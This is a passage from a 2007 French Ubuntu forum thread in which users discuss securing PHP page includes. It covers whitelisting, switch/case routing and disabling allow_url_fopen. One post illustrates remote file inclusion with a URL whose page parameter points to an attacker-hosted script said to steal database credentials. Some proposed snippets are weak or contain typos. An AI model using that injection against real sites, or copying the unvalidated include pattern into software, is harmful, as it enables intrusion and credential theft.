A l'attention des ceusses qui s'y connaissent en truc html

fxdarkplayer · Le 14/06/2007, à 01:06

après y'a la methode de julius, qui met la sécurité à ta seconde methode

M0rbidAngel · Le 14/06/2007, à 01:10

Omphhh!!! (surprise)

Ouais je le voyais pas comme ça.... mais est ce que la fonction "array" palie à ce défaut ou peut elle être elle aussi détournée par un autre jeu d'adresse ?
Sachant que 'accueil' est souvent utilisé en nom de page ou 'gallerie' lorsqu'il y a des photos ou dessins.

Dernière modification par M0rbidAngel (Le 14/06/2007, à 01:11)

valAa · Le 14/06/2007, à 01:16

@M0rbidAngel :

c'est très important et c'est une faille bien connue :

ton script php récupère la variable passée en GET et inclut automatiquement la page portant le nom de la variable.

l'utilisateur ne peut modifier le script en effet. par contre il a accès à l'url, et peut donc modifier la valeur de cette variable.

exemple :
je surfe sur un site, et je me rends comte que pour une page l'url est du type :

http://www.lesite.com/index.php?page=acceuil

Moi, cRaCkerZ en puissance, je me dis tiens et si j'essayais de changer la valeur de cette variable page ?

je tape dans ma barre d'adresse :

http://www.le site.com/index.php?page=http://www.monsitedewarez.com/script_qui_tue

le script_qui_tue pouvant (par exemple) récupérer les identifiants de ta base de donnée histoire de sortir les mots de passe des admins de ton forum et se connecter à leur place.

si tu récupère ta variable avec ta méthode, ton script n'y verra que du feu : il inclue la page et exécute le script, et une heure plus tard une mélasse noire règne dans ton forum (c'est pour faire peur )

il faut donc tester la valeur de la variable qui passe par l'url avant d'inclure la page, histoire de ne pas accepter n'importe quoi.

désolé pour la digression, et bonne nuit !

[edit] trop tard, tu as compris avant ma (superbe) explication
[re-edit] pfffff, j'écris vraiment trop lentement... tout a été dit plus haut !

Dernière modification par valAa (Le 14/06/2007, à 01:21)

M0rbidAngel · Le 14/06/2007, à 01:27

Valaa a écrit :

[edit] trop tard, tu as compris avant ma (superbe) explication big_smile
[re-edit] pfffff, j'écris vraiment trop lentement... tout a été dit plus haut !

mdr Mais est il possible de passer outre la fonction 'array' dans le sens ou si une valeur est spécifiée, cette valeur est elle absolue ou partielle ?
(je ne sai pas si je m'exprime bien donc je file un exemple bidon, pour moi les crackers c'est des gateaux apéros )

http://www.lesite.com/index.php?page=acceuil=je_sais_pas_quoi_mais_mal_intentionné

[edit] je sais faut m'expliquer leeeeeeeeentement mais après c'est fou la vitesse avec laquelle je reproduis les conneries qu'on me raconte

Dernière modification par M0rbidAngel (Le 14/06/2007, à 01:31)

Philbak · Le 14/06/2007, à 01:38

Bon, moi qui n'y connais rien, je me pose la question suivante : n'y aurait-il pas un moyen simple de comparer tout ce qui n'est pas une variable valide dans ce qui arrive dans l'include vers la page appelante ?

Je m'explique : si j'appelle une page "machin.php", n'est-il pas possible de vérifier que ce qui arrive ne comporte par exemple pas de http://" ou de "www", déjà ? et que, plus largement, c'est bien la page "machin.php" qui arrive et non une autre ?

M0rbidAngel · Le 14/06/2007, à 01:41

Pense au topic des couche tard http://forum.ubuntu-fr.org/viewtopic.php?id=59514&p=81
tu win 5 points à cette heure là

Philbak · Le 14/06/2007, à 01:46

C'est quoi, ça ?

valAa · Le 14/06/2007, à 01:47

le meilleur moyen de vérifier que la page est bien une page valide du site, c'est la méthode donnée par Julius un peu plus haut (appelée par M0rbidAngel "méthode des arrays" )

un "array", en php, c'est un tableau, stocké dans une variable.
Julius passe en revue les éléments de ce tableau, et si le contenu passé en url ne s'y trouve pas --> on n'inclut pas. c'est imparable.

pour Philback oui je pense que c'est possible en filtrant la variable avec une expression régulière, mais je ne sais pas ce que ça vaut (contournable ?)

Plonk · Le 14/06/2007, à 02:25

@Philbak : Attention au dernier conseil de M0rbidAngel, on commence par ça et puis on finit par utiliser GNU/Linux, faire des choses bizarres, jouer à des jeux idiots, et élever des trolls inlassablement...

strider · Le 14/06/2007, à 04:21

bon je viens de me faire toute la lecture du fil depuis le début, ca c'est un topic intéressant

De ce fait je vais sûrement réagir sur quelques trucs qui ne sont plus forcement d'actualité.
- Le message d'erreur qui était exposé en 1ère page était pourtant simple à corriger, il s'agit d'un test qui vérifie si le navigateur est bien compatible avec javascript , et dans le cas contraire il envoie paître l'utilisateur. Seulement les créateurs de Web Creator ne se sont pas donné la peine de prendre en charge tout les navigateurs et donc refuse l'entrée a un navigateur qui est pourtant totalement capable.
La solution ? Simplement supprimer ce test. En effet il vaut mieux qu'un visiteur se retrouve sur la page avec des fonctions manquantes a cause de l'utilisation d'un navigateur préhistorique plutôt qu'un utilisateur possédant un navigateur récent se voie refuser l'entrée alors qu'il est 100% compatible.
Pas compliqué a faire , on ouvre le fichier principal du site sur un éditeur, fonction recherche , on colle le message d'erreur qui apparait "blabla votre navigateur pas assez bien blabla" et il est facile de repérer le test.

-Philback, tu dis a un moment que javascript est un langage démodé et ancien , hors ce n'est pas le cas! Javascript commence vraiment a se standardiser (ECMAscript) et a montrer un potentiel hallucinant. Tu as entendu parler de Ajax , du Web 2.0 ? Tout cela est fortement basé sur javascript donc ce n'est pas juste un gadget. Il est vrai en revanche que la majorité des logiciels WYSIWYG incluent du code JS pas forcement très propre. Bref , en quelques années mon opinion de JS a totalement changé, je voyait ça au départ comme un gadget inutile et maintenant je commence à m'y intéresser pour attaquer ensuite la programmation Ajax.

-La validation W3C n'est pas une fin en soit mais en général les webmasters aiment voir leur travail passer la validation , tout comme tu aimes lire un texte sans fautes. Maintenant une page peut être bourrée d'erreurs et très bien s'afficher sur tout les navigateurs. (Heureusement , sinon c'était la mort assurée de tout les éditeurs de pages HTML qui travaillent de manière visuelle)

-Pour le PHP les include($_GET['page']); sont bien sur a éviter ! Pour ma part je suis adepte de la méthode qui utilise une seule page d'index mais j'utilise un switch / case pour coder tout les includes en hard. J'ai fait une seule exception a cette règle sur le site de mon CV en ligne mais étant donné la simplicité du site , son absence de BDD et de back office je me soucie peu de sa sécurité.

Dernière modification par strycore (Le 14/06/2007, à 04:24)

AlexandreP · Le 14/06/2007, à 04:46

Julius a écrit :

EDIT : Tu peux faire mieux avec un code comme celui-ci:
				<?php
				$array = array('accueil', 'activites', 'calendrier', 'contact', 'liens', 'membres', 'plan');
				if( in_array($_GET['page'], $array))
				{ include($_GET['page'].'.php'); }
				else
				{ include("accueil.php"); }
				?>
Tu remplaces accueil, activites, calendrier, contact, etc par tes propres pages. Les fichiers doivent alors être nommés activites.php en étant dans le répertoire courant. Bon bref, tu auras compris je crois :-) ou pas ?

Ça, c'est l'idéal quand on a un petit site avec seulement quelques pages fixes à gérer. Mais si on a une foultitude de pages (disons qu'on a une cinquantaine de pages), je doute que ce soit fort pratique à gérer.

Disons qu'on stocke toutes les pages possibles à inclure au même niveau que 'index.php', puis qu'on utilise ce code :

<?php include('./'.$_GET[,page'].'.php'); ?>

Est-ce que vous pensez que ce serait aussi sécuritaire ?

strider · Le 14/06/2007, à 05:48

je me risquerais pas a faire ca sur un site sensible mais au contraire sur "un petit site avec seulement quelques pages fixes à gérer." (voir mon post plus haut)

Évidement quand le site commence a prendre de l'ampleur , le switch / case deviens énorme mais c'est un mal nécessaire pour rester dans des conditions de sécurité necéssaire.

(J'ai souvent douté de ma méthode , puisque je l'ai trouvé de moi même mais au final ca semble être pas si mal que ca, un peu lourd mais au moins c'est sécurisé)

Knah Tsaeb · Le 14/06/2007, à 08:50

Bonjour, tous le monde !
Bon c'est moi qui gère le PHP de M0rbidAngel, et c'est moi qui gère le server également. Pour la fonction "include" je me protège en la désactivant au niveau du php.ini pour celà changer

allow_url_fopen = on

par

allow_url_fopen = off

. Cette méthode est certe radical, mais elle protège tous les differents sites que j'héberge.

Sinon toutes mes félicitations Philbak pour ta réactivité et ton ouverture d'esprit.

Message perso pour M0rbidAngel, alors c'est qui le BOSS.

Julius · Le 14/06/2007, à 10:09

Y'aurait moyen de voir votre histoire de switch / case ? Ca revient au même non ? En fait, ne suffirait il pas de dire que si la variable contient un http, un ftp, un / ou plus de 15 lettres par exemple, on n'inclus rien du tout. Sinon on fais le include($_GET['page']). On fait attention à ce que tout ce qu'il y a à la racine ne pose pas de problème s'il est inclus.

lawl · Le 14/06/2007, à 10:15

J'utilise la méthode indiqué par strycore et avoir un switch avec 30 cases reste lisible bien plus que les autres méthode donnée ici.
On peut aussi avoir un switch, case minimal sur l'index et en ajouté sur d'autre pages (que l'on classe par thème) incluse dans l'index.
Un avantage du siwtch case est le case par defaut.

strider · Le 14/06/2007, à 10:28

Julius a écrit :

Y'aurait moyen de voir votre histoire de switch / case ? Ca revient au même non ? En fait, ne suffirait il pas de dire que si la variable contient un http, un ftp, un / ou plus de 15 lettres par exemple, on n'inclus rien du tout. Sinon on fais le include($_GET['page']). On fait attention à ce que tout ce qu'il y a à la racine ne pose pas de problème s'il est inclus.

je t'explique !
Avec la methode des arrays tu inclu une page php portant le même nom que ton argument GET or je ne fait pas cela. Avec le nombre de case que j'ai sur mes sites ca multiplierais le nombre de fichiers php et rendrais le projet assez lourd.
Je prefere regrouper plusieurs fonctions dans des fichiers par thème et appeler ces fonctions au moment opportun.
Les includes je les fait au début, avant l'affichage de la page.

D'ailleurs j'ai une question a propos de ca. Est ce que c'est genant en PHP d'inclure pratiquement tout les fichiers du projet au debut de la page ? Est ce que ce n'est pas trop lourd pour le serveur ? Je sais qu'en C++ ou autres langages compilés c'est la méthode utilisée mais en PHP est ce aussi valable ?

Un avantage du siwtch case est le case par defaut.

Exact ! Pas de risques comme cela , les petits malins qui modifieront l'argument GET seront juste redirigé en page d'acceuil

M0rbidAngel · Le 14/06/2007, à 20:42

Knah Tsaeb a écrit :

Bonjour, tous le monde !
Bon c'est moi qui gère le PHP de M0rbidAngel, et c'est moi qui gère le server également. Pour la fonction "include" je me protège en la désactivant au niveau du php.ini pour celà changer
allow_url_fopen = on
par
allow_url_fopen = off
. Cette méthode est certe radical, mais elle protège tous les differents sites que j'héberge.
Sinon toutes mes félicitations Philbak pour ta réactivité et ton ouverture d'esprit.
Message perso pour M0rbidAngel, alors c'est qui le BOSS.

Connais pas cette ligne de code ... mais c'est encore MOI le BOSS parce que sans mon .gif tout pourri fait sous Gimp en 8 jours t'affiches que du texte mon pote hin hin hin

(bon j'ai du boulot moi du coup, déjà que je suis à la bourre , si en plus je me fait basher ici......).

valente · Le 14/06/2007, à 22:08

Bonjour,

Après visite à cette adresse : http://philbakelite.free.fr/....
- C'est rapide
- C'est simple
- C'est très bien !

Des erreurs si il y en a je ne sais pas - aucune d'après "chilperik" - et je te fais confiance et je souhaite sincèrement bonne chance dans la réalisation de ton (votre) projet.

J'ai été plutôt "trash" en m'exprimant ici. J'espère que tu sauras me rendre la monnaie de ma pièce lors de ma prochaine con<censuré>ie dans un des nombreux sujets disponibles du forum Ubuntu.
Il me sera sans doute impossible de réagir aussi vite que toi car je n'ai pas autant de pugnacité a bien faire comme tu viens de nous le prouver.

Bravo !
@+

Philbak · Le 15/06/2007, à 01:43

Bonsoir à tous, et merci pour le compliment, Valente ! Effectivement, d'après le validator de la mort, en Xhtml et css, il n'y a aucune erreur... Et puis, quand tu as dit textuellement l'autre jour : «J'ai beaucoup de respect pour le "Travail bien fait".», je constate que tu ne mentais point, et je t'en félicite !

Alors, pour résumer, à part que je n'ai évidemment rien compris à tout votre code, pour la fonction include (je n'en suis qu'à cette leçon : http://www.siteduzero.com/tuto-3-68-1-premiers-pas-avec-php.html) sur le site sus-nommé, j'ai réussi à faire un certain nombre de choses que je voulais faire. Apparemment, mes menus ne changent plus de position entre IE et FF, mes textes non plus, pas plus que les photos ! C'est un progrès, non ? Et Opéra me donne ce que je demande, tout va bien.

J'ai quand même décidé, après avoir réussi ça en XHTML et CSS only, de tâter du PHP avec justement la fonction include. J'ai choisi la méthode "brutale" de Météor21, du site du Zéro. Je n'appelle qu'une page en particulier en en ouvrant une. Elle est désignée, il n'y a pas de raison pour qu'une autre soit "includée". Bon, c'est pas sûr, mais ya des chances. Je ne fais traîner aucune variable dans l'url. Et puis, je n'ai que 7 pages en tout, je crois, alors la répétition du code ne me gêne pas, d'autant que la fonction copier-coller marche encore très bien !

J'ai donc travaillé sur deux pages, l'accueil et une autre (House). En ouvrant l'accueil, ma première chose faite dans le body c'est d'appeler la page de fond, les menus, la déco, etc. Par include. Même chose avec la deuxième page que j'ai faite. Quand la suite du code s'éxécute, c'est chaque page qui est affichée, selon celle dans laquelle on est.

Cela me paraît fort lent, je dois dire, plus lent qu'en XHTML, à l'affichage. C'est ce qui est en ligne sur ma page perso Free.

Alors ce soir je m'essaye à autre chose : je charge le fond (menus, déco, etc.) en premier et j'appelle les pages. On verra bien. Si je le mets en ligne cette nuit, je le mettrai en double, dans un autre dossier. Pour comparer. Il faudra donc rajouter /phpdeux à l'adresse, ok ?

J'y vais, je n'en ai pas pour longtemps, je reviens. A tout'

Bye, Phil !

EDIT : je suis déjà revenu quelques instants plus tard ! J'ai fait comme j'ai dit, j'ai une page index qui crée le fond et appelle le code de la page accueil avec include, tout est bon. Sauf que je ne sais pas transformer mon menu pour appeler ma deuxième page !

En gros, je voudrais transformer l'un des items (tous, à terme, évidemment !) de mon menu : <a href="house.php"> House MD</a>, en l'occurrence, en... je ne sais pas quoi. Sans doute est-ce ici que je dois faire une chaîne array pour remplacer mon menu ? Ou un switch ? Pas cool, je dois sauter plein de leçons pour y arriver ! .

Je vais aller relire les codes que vous m'avez donnés plus haut !

Dernière modification par Philbak (Le 15/06/2007, à 02:03)

Philbak · Le 16/06/2007, à 01:27

Bon, je sèche lamentablement ! Je résume ce que je cherche à faire :

J'ai une page index qui charge le fond d'écran, un menu et un texte d'accueil (éventuellement chargé par la fonction include, par défaut). C'est donc la page d'accueil.

Le menu doit appeler (par la fonction include) différentes pages qui vont constituer le corps de la page, à la place du texte d'accueil.

En fait, ce que je cherche à faire, c'est un menu en PHP qui va remplacer le menu lien classique HTML : 6 pages, soit 6 fois <a href="page_n.php"></a>.

Vous voyez ce que je veux dire ? Je souhaiterais un code PHP qui permettrait de lancer la fonction "include telle page" quand on clique sur un des six "liens" au choix... et qui viderait la page index de son texte d'accueil, par la même occcasion.

J'espère que je ne vous en demande pas trop. C'est aussi parce que l'on m'a conseillé (ici aussi je crois) de charger plutôt le fond en constant, de telle façon qu'il reste en mémoire chez l'utilisateur, et ainsi, on ne charge que le contenu, d'où une vitesse accrue et moins de bande passante consommée...

Merci d'avance, mais svp avec des explications, je ne veux pas juste recopier du code, je veux comprendre...

Bye, Phil !

M0rbidAngel · Le 16/06/2007, à 02:17

@Philbak
Yop, j'ai vu avec mon pote, on va t'envoyer un de nos sites en complet sauf la partie serveur , histoire que tu puisse voir une façon de faire.
Tu pourras compter sur moi (un peu) pour quelques explications.....ça fera 200 euros

Bon regarde ta boite mail courant de la semaine.
++

Philbak · Le 16/06/2007, à 02:22

Merci, c'est génial !

Il est trop tard pour moi , je vais me coucher, mais on en reparle, ok ?

Merci encore et bonne nuit !

Bye, Phil

Dernière modification par Philbak (Le 16/06/2007, à 02:22)

valAa · Le 16/06/2007, à 13:18

Philbak a écrit :

Le menu doit appeler (par la fonction include) différentes pages qui vont constituer le corps de la page, à la place du texte d'accueil.
En fait, ce que je cherche à faire, c'est un menu en PHP qui va remplacer le menu lien classique HTML : 6 pages, soit 6 fois <a href="page_n.php"></a>.
Vous voyez ce que je veux dire ? Je souhaiterais un code PHP qui permettrait de lancer la fonction "include telle page" quand on clique sur un des six "liens" au choix... et qui viderait la page index de son texte d'accueil, par la même occcasion.

salut,

il faut utiliser le passage de variables par l'url :

ton lien doit-être :

<a href="index.php?page=page1">

par exemple.

dans index.php, tu te retrouve donc avec une variable page que tu peux récupérer avec la méthode GET.
ensuite tu teste que la valeur "page1" est bien une page de ton site (par exemple avec la méthode de julius plus haut) et si c'est bon tu pourras inclure la page.

pour le vidage de la page d'accueil, je procèderais comme suis.

d'abord je teste l'existence de la variable $_GET[page].
si elle n'existe pas (j'arrive sur index.php sans variable dans l'url), j'inclus la page contenant le texte de la page d'acceuil.
si elle existe (j'arrive par un des liens du genre "index.php?page=pageX"), alors j'inclus la page en question (pageX).

[edit] pour tester l'existence de la variable :

isset $_GET[page]

Dernière modification par valAa (Le 16/06/2007, à 13:23)

M0rbidAngel · Le 16/06/2007, à 19:00

Pour les utilisateurs de Firefox, un super outil ici :http://joliclic.free.fr/mozilla/webdeveloper/
Sinon , en discutant avec Knah-tsaeb, il semblerait que sa méthode soit non seulement plus légère mais est totalement impénétrable.
Cela consiste tout simplement à refuser toutes les pages non contenues sur le serveur.

Decidemment si le boss c'est pas lui, il en est pas loin

M0rbidAngel · Le 17/06/2007, à 20:17

ATTENTION!!!

L'extension webdevelloper est un gouffre de ressources.
Je ne l'ai installé que hier pour bosser sur les conseils de PéHachePeur et c'est vrai que cet outil est génial.
Par contre désactiver le pour le surf intensif (30 sec en moyenne pour avoir une page).

Ubuntu-fr

Navigation

Liens de recherche

Annonce

#76 Le 14/06/2007, à 01:06

Re : A l'attention des ceusses qui s'y connaissent en truc html

#77 Le 14/06/2007, à 01:10

Re : A l'attention des ceusses qui s'y connaissent en truc html

#78 Le 14/06/2007, à 01:16

Re : A l'attention des ceusses qui s'y connaissent en truc html

#79 Le 14/06/2007, à 01:27

Re : A l'attention des ceusses qui s'y connaissent en truc html

#80 Le 14/06/2007, à 01:38

Re : A l'attention des ceusses qui s'y connaissent en truc html

#81 Le 14/06/2007, à 01:41

Re : A l'attention des ceusses qui s'y connaissent en truc html

#82 Le 14/06/2007, à 01:46

Re : A l'attention des ceusses qui s'y connaissent en truc html

#83 Le 14/06/2007, à 01:47

Re : A l'attention des ceusses qui s'y connaissent en truc html

#84 Le 14/06/2007, à 02:25

Re : A l'attention des ceusses qui s'y connaissent en truc html

#85 Le 14/06/2007, à 04:21

Re : A l'attention des ceusses qui s'y connaissent en truc html

#86 Le 14/06/2007, à 04:46

Re : A l'attention des ceusses qui s'y connaissent en truc html

#87 Le 14/06/2007, à 05:48

Re : A l'attention des ceusses qui s'y connaissent en truc html

#88 Le 14/06/2007, à 08:50

Re : A l'attention des ceusses qui s'y connaissent en truc html

#89 Le 14/06/2007, à 10:09

Re : A l'attention des ceusses qui s'y connaissent en truc html

#90 Le 14/06/2007, à 10:15

Re : A l'attention des ceusses qui s'y connaissent en truc html

#91 Le 14/06/2007, à 10:28

Re : A l'attention des ceusses qui s'y connaissent en truc html

#92 Le 14/06/2007, à 20:42

Re : A l'attention des ceusses qui s'y connaissent en truc html

#93 Le 14/06/2007, à 22:08

Re : A l'attention des ceusses qui s'y connaissent en truc html

#94 Le 15/06/2007, à 01:43

Re : A l'attention des ceusses qui s'y connaissent en truc html

#95 Le 16/06/2007, à 01:27

Re : A l'attention des ceusses qui s'y connaissent en truc html

#96 Le 16/06/2007, à 02:17

Re : A l'attention des ceusses qui s'y connaissent en truc html

#97 Le 16/06/2007, à 02:22

Re : A l'attention des ceusses qui s'y connaissent en truc html

#98 Le 16/06/2007, à 13:18

Re : A l'attention des ceusses qui s'y connaissent en truc html

#99 Le 16/06/2007, à 19:00

Re : A l'attention des ceusses qui s'y connaissent en truc html

#100 Le 17/06/2007, à 20:17

Re : A l'attention des ceusses qui s'y connaissent en truc html

Pied de page des forums